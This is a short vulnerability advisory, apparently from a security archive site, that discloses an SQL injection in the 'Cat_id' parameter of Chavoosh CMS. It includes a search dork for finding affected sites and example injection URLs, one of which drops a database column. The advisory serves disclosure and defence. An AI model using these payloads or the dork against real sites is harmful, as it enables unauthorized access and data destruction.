Chavoosh CMS SQL Injection Vulnerability

2009-08-12 / 2009-08-13
Credit: Isfahan University of Technology
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: Design by chavoosh Co

* Title: Chavoosh CMS SQL Injection Vulnerability Vendor: www.chavoosh.com Dork: Design by chavoosh Co Type: Input.Validation.Vulnerability (SQL Injection) Fix: N/A * nsec.ir ================= Description: Chavoosh is a CMS producer in Iran. �contentarchive.aspx� page in Chavoosh CMS product is vulnerable to SQL Injection vulnerability. Vulnerability Variant: URI Injection "/contentarchive.aspx" in "Cat_id" parameter. http://example.com/content/contentarchive.aspx?Cat_id=82+UNION+SELECT+ @@version&Landir=rtl&Lan=Fa http://example.com/content/contentarchive.aspx?Cat_id=82+HAVING+1=1 &Landir=rtl&Lan=Fa http://example.com/content/contentarchive.aspx?Cat_id=82+ALTER+TABLE+contentcategory+DROP+COLUMN+category_name&Landir=rtl&Lan=Fa Solution: Input validation of Parameter "Cat_id" should be corrected. Credit: Isfahan University of Technology - Computer Emergency Response Team Thanks to : E. Jafari, N. Fathi, M. R. Faghani Received on Aug 12 2009

References:

http://seclists.org/bugtraq/2009/Aug/0095.html


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top